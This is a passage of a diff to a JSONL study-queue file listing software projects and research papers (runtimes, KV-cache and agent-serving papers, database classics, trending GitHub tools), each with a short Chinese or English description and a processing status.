actor 标准库","meta":{"col3":"~12k","col4":"抢占式调度 + 隔离堆 + supervisor,电信级容错语言根基"},"url":"https://github.com/erlang/otp","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"elixir","area":"projects","topic":"runtimes","title":"Elixir — BEAM 上的现代语言","meta":{"col3":"~25k","col4":"Ruby 风语法 + macro + LiveView,把 BEAM 带进现代 Web"},"url":"https://github.com/elixir-lang/elixir","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"gleam","area":"projects","topic":"runtimes","title":"Gleam — 静态类型 BEAM 语言","meta":{"col3":"~18k","col4":"Rust 风类型系统 + BEAM / JS 双后端,类型化 actor 范例"},"url":"https://github.com/gleam-lang/gleam","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"zig","area":"projects","topic":"runtimes","title":"Zig — 无隐藏控制流的 C 替代","meta":{"col3":"~38k","col4":"comptime 元编程 + 零成本抽象,自带跨平台编译 toolchain"},"url":"https://github.com/ziglang/zig","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} @@ -1510,7 +1511,7 @@ {"slug":"crystal","area":"projects","topic":"runtimes","title":"Crystal — Ruby 语法的静态类型语言","meta":{"col3":"~20k","col4":"LLVM 后端 + 类型推断 + fiber 并发,Ruby 风格的原生性能"},"url":"https://github.com/crystal-lang/crystal","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"nim","area":"projects","topic":"runtimes","title":"Nim — Python 风的系统语言","meta":{"col3":"~17k","col4":"编译到 C / C++ / JS,宏系统强大,零依赖单二进制"},"url":"https://github.com/nim-lang/Nim","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"julia","area":"projects","topic":"runtimes","title":"Julia — 数值计算专用语言","meta":{"col3":"~46k","col4":"LLVM JIT + 多分派 + 包系统,Python+C 的\"双语言问题\"答案"},"url":"https://github.com/JuliaLang/julia","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"tinygo","area":"projects","topic":"runtimes","title":"TinyGo — 嵌入式 / wasm 的 Go 子集","meta":{"col3":"~16k","col4":"LLVM 后端,把 Go 跑在 ARM / RISC-V / Wasm 上"},"url":"https://github.com/tinygo-org/tinygo","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} +{"slug":"tinygo","area":"projects","topic":"runtimes","title":"TinyGo — 嵌入式 / wasm 的 Go 子集","meta":{"col3":"~16k","col4":"LLVM 后端,把 Go 跑在 ARM / RISC-V / Wasm 上"},"url":"https://github.com/tinygo-org/tinygo","status":"written","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"goja","area":"projects","topic":"runtimes","title":"goja — 纯 Go 写的 ES5.1 解释器","meta":{"col3":"~6.5k","col4":"Go 程序嵌入 JS 脚本的标配,k6 / dnote 等都依赖"},"url":"https://github.com/dop251/goja","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"yaegi","area":"projects","topic":"runtimes","title":"yaegi — Traefik 的 Go 解释器","meta":{"col3":"~7.6k","col4":"在 Go 程序里热加载 Go 代码,插件系统 / REPL 应用"},"url":"https://github.com/traefik/yaegi","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"tokio","area":"projects","topic":"runtimes","title":"Tokio — 事实标准 Rust async runtime","meta":{"col3":"~28k","col4":"多线程 work-stealing 调度器 + epoll/kqueue 抽象"},"url":"https://github.com/tokio-rs/tokio","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} @@ -1521,498 +1522,994 @@ {"slug":"mmtk-core","area":"projects","topic":"runtimes","title":"MMTk — 通用 GC 框架","meta":{"col3":"~600","col4":"把 GC 从语言中解耦,被 OpenJDK / V8 / Julia 接入实验"},"url":"https://github.com/mmtk/mmtk-core","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"bdwgc","area":"projects","topic":"runtimes","title":"Boehm-Demers-Weiser GC — 经典保守式 GC","meta":{"col3":"~3.1k","col4":"不需类型信息也能用的 C/C++ GC 库,GCC / Mono 等历史依赖"},"url":"https://github.com/ivmai/bdwgc","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} {"slug":"mimalloc","area":"projects","topic":"runtimes","title":"mimalloc — Microsoft 的小对象分配器","meta":{"col3":"~10k","col4":"分片堆 + free list sharding,多线程基准超越 jemalloc / tcmalloc"},"url":"https://github.com/microsoft/mimalloc","status":"queued","claimed_by":null,"attempts":0,"source_file":"projects-runtimes.md"} -{"slug":"kv-fold","area":"papers","topic":"machine-learning","title":"KV-Fold: One-Step KV-Cache Recurrence for Long-Context Inference","meta":{"col3":"2026","col4":"Training-free long-context inference: treats KV cache as fold accumulator across recurrence steps. High priority for vLLM lens."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"vericache","area":"papers","topic":"machine-learning","title":"VeriCache: Turning Lossy KV Cache into Lossless LLM Inference","meta":{"col3":"2026","col4":"Speculative-decoding twist: drafts with compressed KV, verifies against full KV. High priority for vLLM lens."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"oscar-int2-kv","area":"papers","topic":"machine-learning","title":"OSCAR: Offline Spectral Covariance-Aware Rotation for 2-bit KV Cache Quantization","meta":{"col3":"2026","col4":"INT2 KV quant integrated into vLLM/SGLang via custom kernel; covariance-aware rotation. High priority direct vLLM relevance."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"nestedkv","area":"papers","topic":"machine-learning","title":"NestedKV: Nested Memory Routing for Long-Context KV Cache Compression","meta":{"col3":"2026","col4":"Combines global/block/sliding-window anchors with multi-time-scale anomaly scoring."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"triaxialkv","area":"papers","topic":"machine-learning","title":"TriAxialKV: Extreme Low-Precision KV-Cache Quantization for Agentic Inference","meta":{"col3":"2026","col4":"Mixed-precision KV quant tailored to agent workloads (multi-turn, tool calls, multi-modal)."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"memory-tool-use-agents","area":"papers","topic":"machine-learning","title":"When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?","meta":{"col3":"2026","col4":"Decouples memory abstraction from inference strategy across best-of-N/beam/MCTS. High priority for agent design lens."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"storm-multi-agent-state","area":"papers","topic":"machine-learning","title":"STORM: State-Oriented Management for Multi-Agent Collaboration","meta":{"col3":"2026","col4":"Replaces git-worktree isolation with explicit shared-state mediation for multi-agent."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"cci-agent-scaffolding","area":"papers","topic":"machine-learning","title":"Cross-Component Interference in LLM Agent Scaffolding","meta":{"col3":"2026","col4":"Full 2^5 factorial over plan/tool/memory/reflection/retrieval. All-In is suboptimal. High priority for agent eng."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"crossover-context-multi-agent","area":"papers","topic":"machine-learning","title":"When Context Hurts: Crossover Effect of Knowledge Transfer on Multi-Agent Design","meta":{"col3":"2026","col4":"2700 runs show context injection hurts as often as helps; single no-context baseline. High priority."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"spec-agent-separation-logic","area":"papers","topic":"formal-methods","title":"Agentic Separation Logic Specification Synthesis","meta":{"col3":"2026","col4":"LLM agent synthesizes propositional/first-order separation-logic specs for million-LOC C."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"amaryllis-probabilistic-iris","area":"papers","topic":"formal-methods","title":"First Steps Towards Probabilistic Iris (Amaryllis)","meta":{"col3":"2026","col4":"First general-purpose probabilistic separation logic supporting dynamic heap allocation."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"first-class-refinement-scala","area":"papers","topic":"compilers-pl","title":"First-Class Refinement Types for Scala","meta":{"col3":"2026","col4":"Refinement types as ordinary types; interact with subtyping/inference/pattern matching."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"tutti-ssd-kv-cache","area":"papers","topic":"machine-learning","title":"Tutti: Making SSD-Backed KV Cache Practical for Long-Context LLM Serving","meta":{"col3":"2026","col4":"GPU io_uring + GPU-native object store eliminates CPU intervention from SSD-backed KV. High priority for vLLM lens."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"hexagent-agentic-scheduling","area":"papers","topic":"machine-learning","title":"HexAGenT: Workflow- and Heterogeneity-Aware Scheduling for Agentic LLM Serving","meta":{"col3":"2026","col4":"Schedules online-revealed agent DAGs across heterogeneous A100/H100/H200 PD-disaggregated. High priority."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"llm-serving-needs-math","area":"papers","topic":"machine-learning","title":"LLM Serving Needs Mathematical Optimization, Not Just Heuristics","meta":{"col3":"2026","col4":"Position paper: vLLM/SGLang use FIFO + LRU + JSQ unchanged from classical distributed sys. High priority."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"vibeserve","area":"papers","topic":"machine-learning","title":"VibeServe: Can AI Agents Build Bespoke LLM Serving Systems?","meta":{"col3":"2026","col4":"Multi-agent loop synthesizes whole serving stacks end-to-end; matches vLLM in some configs."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"qwen-vla","area":"papers","topic":"machine-learning","title":"Qwen-VLA: Unifying Vision-Language-Action across Tasks, Environments, Embodiments","meta":{"col3":"2026","col4":"Big-team Qwen unified embodied foundation model: DiT action decoder atop Qwen-VL."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"visualthink-vla","area":"papers","topic":"machine-learning","title":"VisualThink-VLA: Visual Intermediate Reasoning for Low-Latency VLA Policies","meta":{"col3":"2026","col4":"Replaces text chain-of-thought with visual evidence tokens; 8.4s to 0.37s per step."},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"hyprland","area":"projects","topic":"operating-systems","title":"Hyprland","meta":{"col3":"C++","col4":"独立的动态平铺 Wayland compositor,36k star、月增 ~900;学 Linux 桌面 infra/合成器架构、wlroots。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"gitleaks","area":"projects","topic":"security-privacy","title":"Gitleaks","meta":{"col3":"Go","col4":"Secret 扫描 CLI,27k star,pre-commit/CI 标配;规则引擎和 git history 遍历是 DevSec 范式。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"bitwarden-server","area":"projects","topic":"security-privacy","title":"Bitwarden Server","meta":{"col3":"C#/.NET","col4":"开源密码管理器后端,19k star;多租户加密存储与 zero-knowledge 设计参考。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"nextcloud-server","area":"projects","topic":"backend-api","title":"Nextcloud Server","meta":{"col3":"PHP","col4":"自托管云存储/协作平台,35k star;plugin 体系/文件同步协议/共享权限模型。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"paperless-ngx","area":"projects","topic":"backend-api","title":"Paperless-ngx","meta":{"col3":"Python/Django","col4":"文档管理系统,41k star、月增 1700;OCR + 索引 + tag 自动化。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"tabby-terminal","area":"projects","topic":"cli","title":"Tabby Terminal","meta":{"col3":"TypeScript/Electron","col4":"现代化跨平台终端模拟器,71k star;学跨平台 GUI 封装 ssh/serial/wsl 多会话。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"authentik","area":"projects","topic":"security-privacy","title":"Authentik","meta":{"col3":"Python","col4":"开源 IdP,22k star,OAuth2/OIDC/SAML 全协议;自托管 SSO 替代 Keycloak。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"ente","area":"projects","topic":"security-privacy","title":"Ente","meta":{"col3":"Dart+Go","col4":"端到端加密相册/网盘,27k star;客户端加密 + 服务端零知识架构。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"nango","area":"projects","topic":"backend-api","title":"Nango","meta":{"col3":"TypeScript","col4":"Unified API for 200+ SaaS,9.5k star、月增 2200;OAuth/连接器/sync 引擎。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"openai-codex-cli","area":"projects","topic":"cli","title":"OpenAI Codex CLI","meta":{"col3":"Rust","col4":"OpenAI 终端编程 agent,87k star、月增 8k;与 Claude Code 对照学 sandbox/工具调用/审批流。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"ccusage","area":"projects","topic":"cli","title":"ccusage","meta":{"col3":"Rust","col4":"分析本地 Claude Code/Codex token 使用与成本,15k star;dev-tooling 自反馈基础设施。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"zizmor","area":"projects","topic":"security-privacy","title":"zizmor","meta":{"col3":"Rust","col4":"GitHub Actions 静态分析器,5.4k star;CI workflow 漏洞模式(pwn requests/token 泄露)。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"ai-dynamo","area":"projects","topic":"machine-learning","title":"ai-dynamo / Dynamo","meta":{"col3":"Rust","col4":"Datacenter-Scale 分布式推理框架,7k star;vLLM 之外的多节点推理范式。High priority。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"cocoindex","area":"projects","topic":"machine-learning","title":"cocoindex","meta":{"col3":"Python","col4":"增量索引/数据流引擎给 long-horizon agent 用,10k star、月增 3k;agent 数据层(embedding/retrieval)。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"ui-tars","area":"projects","topic":"machine-learning","title":"UI-TARS","meta":{"col3":"Python","col4":"字节开源原生 GUI 自动化 agent,10.8k star;vision-grounded computer-use agent 范式。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"maigret","area":"projects","topic":"security-privacy","title":"Maigret","meta":{"col3":"Python","col4":"OSINT CLI,按 username 跨 3000+ 站收集账号画像,31k star;异步爬虫/插件化数据源。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"technitium-dns-server","area":"projects","topic":"network-protocols","title":"Technitium DNS Server","meta":{"col3":"C#","col4":"自托管递归 DNS(DoH/DoT/blocklist),8.6k star;DNS 协议/网络 infra 完整可读实现。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"sqlite-durable-workflows","area":"papers","topic":"databases","title":"SQLite is all you need for durable workflows","meta":{"col3":"2026","col4":"619 分置顶;把 durable execution(Temporal/Restate)压到单文件 SQLite,揭示 WAL+FIFO+索引足以替代专用引擎。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"bijou64-varint","area":"papers","topic":"compilers-pl","title":"Bijou64: A variable-length integer encoding","meta":{"col3":"2026","col4":"Ink & Switch 出品;变长 64 位整数编码新方案,对比 LEB128/varint 给出更紧凑且分支预测友好的设计。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"zig-build-rework","area":"projects","topic":"compilers-pl","title":"Zig Build System Reworked","meta":{"col3":"Zig","col4":"build.zig 大改:把 step graph 拆成纯描述+并发执行;与 Bazel/Buck2 对比能看清声明式 build 架构。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"lfm2-5-8b-a1b-moe","area":"papers","topic":"machine-learning","title":"Liquid AI LFM2.5 8B-A1B MoE Trained on 38T Tokens","meta":{"col3":"2026","col4":"非 Transformer/SSM 混合 MoE,激活 1B 参数;38T token 训练规模公开数据点。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"yocto-alternatives","area":"papers","topic":"embedded","title":"You probably don't need Yocto, and that's fine","meta":{"col3":"2026","col4":"sigma-star 反共识技术分析:何时 Buildroot/Debian 比 Yocto 更对;附决策矩阵。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"compiler-perf-left-on-table","area":"papers","topic":"compilers-pl","title":"Leaving performance on the table","meta":{"col3":"2026","col4":"具体 benchmark 展示编译器没用尽的优化机会(PGO、LTO、自动向量化盲区)。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"rendering-diffs","area":"papers","topic":"editors","title":"On Rendering Diffs","meta":{"col3":"2026","col4":"pierre.computer 写自己 diff viewer 的渲染优化:virtualization、token 级 syntax highlighting。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"pandoc-templates","area":"projects","topic":"editors","title":"Pandoc Templates","meta":{"col3":"Haskell","col4":"Pandoc 模板生态站,把 markdown→PDF/LaTeX/HTML 模板系统化;学术写作/简历自动化。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"openrsync","area":"projects","topic":"operating-systems","title":"Openrsync: An implementation of rsync, by the OpenBSD team","meta":{"col3":"C","col4":"OpenBSD 重写 rsync,BSD 许可、协议兼容;rolling checksum + delta sync 最小可行实现。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"snowboard-kids-2-decomp","area":"projects","topic":"compilers-pl","title":"Snowboard Kids 2 is 100% Decompiled","meta":{"col3":"C","col4":"N64 完整反编译里程碑;matching decomp 工作流(mips_to_c、splat、ido recompiler)。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"mcp-is-dead-debate","area":"papers","topic":"backend-api","title":"MCP is dead?","meta":{"col3":"2026","col4":"quandri 工程博客对 Model Context Protocol 局限的批评(schema 漂移、stdin/stdout 限制)。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"hekaton","area":"papers","topic":"databases","title":"Hekaton: SQL Server's Memory-Optimized OLTP Engine","meta":{"col3":"2013","col4":"CMU 15-721 多周引用;MVCC + lock-free + native compilation 工业首发。High priority distsys/db classic。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"bw-tree","area":"papers","topic":"databases","title":"The Bw-Tree: A B-tree for New Hardware Platforms","meta":{"col3":"2013","col4":"CMU 15-721 索引专题;lock-free B-tree + log-structured page store。High priority。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"wisckey","area":"papers","topic":"databases","title":"WiscKey: Separating Keys from Values in SSD-conscious Storage","meta":{"col3":"2016","col4":"FAST'16 best paper;解释 RocksDB write-amplification 根源 + Titan/BlobDB 设计动机。High priority。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"oltp-looking-glass","area":"papers","topic":"databases","title":"OLTP Through the Looking Glass, and What We Found There","meta":{"col3":"2008","col4":"Stonebraker 拆解 90% 时间在 buffer/lock/log;H-Store/VoltDB/Hekaton/SiloR 共同前提。High priority。"},"url":"","status":"new","claimed_by":null,"attempts":0,"source_file":"external-2026-05-30"} -{"slug":"llmsurgeon-data-mixture","area":"papers","topic":"machine-learning","title":"LLMSurgeon: Diagnosing Data Mixture of Large Language Models","meta":{"col3":"2026","col4":"arXiv 2605.30348;从生成文本反推预训练数据 domain 分布;data provenance auditing 新框架。"},"url":"https://arxiv.org/abs/2605.30348","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"rim-latent-reasoning","area":"papers","topic":"machine-learning","title":"Reasoning in Memory: Unlocking the Working Memory of LLMs for Latent Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30343;用固定 memory token 替代 autoregressive CoT;Hochreiter 团队。"},"url":"https://arxiv.org/abs/2605.30343","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"hullft-ttft","area":"papers","topic":"machine-learning","title":"HullFT: Efficient Test-Time Finetuning via Convex Reconstruction and Gradient Caching","meta":{"col3":"2026","col4":"arXiv 2605.30337;Frank-Wolfe 投影 + gradient reuse;TTFT 质量-速度新前沿。"},"url":"https://arxiv.org/abs/2605.30337","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"compositional-incoherence","area":"papers","topic":"machine-learning","title":"Locally Coherent, Globally Incoherent: Bounding Compositional Incoherence in Multi-Component LLM Agents","meta":{"col3":"2026","col4":"arXiv 2605.30335;多 LLM 组件违反概率公理;Boyle-Dykstra projection 修复。"},"url":"https://arxiv.org/abs/2605.30335","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"demystifying-data-org","area":"papers","topic":"machine-learning","title":"Demystifying Data Organization for Enhanced LLM Training","meta":{"col3":"2026","col4":"arXiv 2605.30334;4 条数据排序原则 + STR/SAW;Microsoft data-efficacy 项目。"},"url":"https://arxiv.org/abs/2605.30334","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"compose-future-theorems","area":"papers","topic":"machine-learning","title":"COMPOSE: Composing Future Theorems from Citations and Formal Structure","meta":{"col3":"2026","col4":"arXiv 2605.30333;arXiv + Mathlib 双图条件生成;108K paired examples 数据集。"},"url":"https://arxiv.org/abs/2605.30333","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"soundness-bench","area":"papers","topic":"machine-learning","title":"SoundnessBench: Can Your AI Scientist Really Tell Good Research Ideas from Bad Ones?","meta":{"col3":"2026","col4":"arXiv 2605.30329;1099 ICLR 提案 soundness 评估;frontier LLM 普遍存在 optimism bias。"},"url":"https://arxiv.org/abs/2605.30329","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"resolution-diagnostics-llm","area":"papers","topic":"machine-learning","title":"Resolution Diagnostics for Paired LLM Evaluation","meta":{"col3":"2026","col4":"arXiv 2605.30315;Open LLM Leaderboard 27% 排名未达统计 resolution;常用 calculator 偏差 ~2x。"},"url":"https://arxiv.org/abs/2605.30315","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"mira-rubric","area":"papers","topic":"machine-learning","title":"MIRA: Mid-training Rubric Anchoring for Source-Aware Data Selection","meta":{"col3":"2026","col4":"arXiv 2605.30288;mid-training 阶段 self-anchored rubric discovery;半 token 匹配全语料。"},"url":"https://arxiv.org/abs/2605.30288","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"projection-bench","area":"papers","topic":"machine-learning","title":"ProjectionBench: Evaluating Scientific Hypothesis Generation in LLMs Under Progressive Information Disclosure","meta":{"col3":"2026","col4":"arXiv 2605.30284;逐步揭示信息测假说生成;GPT-5.4/Gemini 3.1 pro F1=0.7 minimal context。"},"url":"https://arxiv.org/abs/2605.30284","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"loong-doc-mt","area":"papers","topic":"machine-learning","title":"Loong: Human-Like Long Document Translation Agent with Adaptive Context Selection","meta":{"col3":"2026","col4":"arXiv 2605.30274;3E memory module;EN<->ZH/DE/FR 平均 +13.0 metric points。"},"url":"https://arxiv.org/abs/2605.30274","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"mem-ft-lora","area":"papers","topic":"machine-learning","title":"How LoRA Remembers? A Parametric Memory Law for LLM Finetuning","meta":{"col3":"2026","col4":"arXiv 2605.30260;ΔLoss vs effective params 幂律;token-level p>0.5 phase transition;MemFT 优化。"},"url":"https://arxiv.org/abs/2605.30260","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"ccopd-distillation","area":"papers","topic":"machine-learning","title":"CCOPD: Canonical-Context On-Policy Distillation for Multi-Turn Language Models","meta":{"col3":"2026","col4":"arXiv 2605.30251;同 evidence 不同呈现导致 self-anchored drift;32% relative improvement。"},"url":"https://arxiv.org/abs/2605.30251","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"codegraph-claude-code","area":"projects","topic":"devtools","title":"colbymchenry/codegraph: Pre-indexed code knowledge graph for Claude Code/Codex/Cursor","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;为 coding agent 提供 indexed graph context。"},"url":"https://github.com/colbymchenry/codegraph","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"anthropic-financial-services","area":"projects","topic":"backend-api","title":"anthropics/financial-services: Financial services workflows on Claude","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;Anthropic 官方金融场景 cookbook + agent 模板。"},"url":"https://github.com/anthropics/financial-services","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"cloak-browser","area":"projects","topic":"security-privacy","title":"CloakHQ/CloakBrowser: Stealth Chromium passing bot-detection (Playwright drop-in)","meta":{"col3":"2026","col4":"GitHub trending 30d;fingerprint patches;Playwright 兼容;scraping/automation。"},"url":"https://github.com/CloakHQ/CloakBrowser","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"understand-anything-graph","area":"projects","topic":"devtools","title":"Lum1104/Understand-Anything: Interactive knowledge graph for code exploration","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;visualize codebase as queryable graph。"},"url":"https://github.com/Lum1104/Understand-Anything","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"agent-memory","area":"projects","topic":"machine-learning","title":"rohitg00/agentmemory: Persistent memory system for AI coding agents","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;benchmarked memory backend;session 持久化。"},"url":"https://github.com/rohitg00/agentmemory","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"academic-research-skills","area":"projects","topic":"devtools","title":"Imbad0202/academic-research-skills: Research workflow automation for Claude Code","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;学术写作/调研 skill 集合。"},"url":"https://github.com/Imbad0202/academic-research-skills","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"mattpocock-skills","area":"projects","topic":"devtools","title":"mattpocock/skills: Engineering skills reference collection","meta":{"col3":"2026","col4":"GitHub trending 30d;Shell;Matt Pocock 整理的工程实践 skill 库。"},"url":"https://github.com/mattpocock/skills","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"ai-engineering-scratch","area":"projects","topic":"machine-learning","title":"rohitg00/ai-engineering-from-scratch: Building and shipping AI systems","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;端到端 AI 系统从零搭建教程。"},"url":"https://github.com/rohitg00/ai-engineering-from-scratch","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"nine-router","area":"projects","topic":"devtools","title":"decolua/9router: AI coding tool connector with multi-provider auto-fallback","meta":{"col3":"2026","col4":"GitHub trending 30d;JavaScript;多 LLM provider 路由 + 故障切换。"},"url":"https://github.com/decolua/9router","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"ruflo-claude","area":"projects","topic":"machine-learning","title":"ruvnet/ruflo: Multi-agent orchestration platform for Claude","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;agent workflow orchestration framework。"},"url":"https://github.com/ruvnet/ruflo","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"bytedance-ui-tars","area":"projects","topic":"machine-learning","title":"bytedance/UI-TARS-desktop: Multimodal AI agent stack","meta":{"col3":"2026","col4":"GitHub trending 30d;TypeScript;连接 vision-language model 与 desktop infra。"},"url":"https://github.com/bytedance/UI-TARS-desktop","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"andrej-karpathy-skills","area":"projects","topic":"devtools","title":"multica-ai/andrej-karpathy-skills: Claude Code behavior tuning guide","meta":{"col3":"2026","col4":"GitHub trending 30d;Karpathy 风格的 coding agent prompt/skill 集。"},"url":"https://github.com/multica-ai/andrej-karpathy-skills","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"maigret-osint","area":"projects","topic":"security-privacy","title":"soxoj/maigret: OSINT username search across 3000+ sites","meta":{"col3":"2026","col4":"GitHub trending 30d;Python;按 username 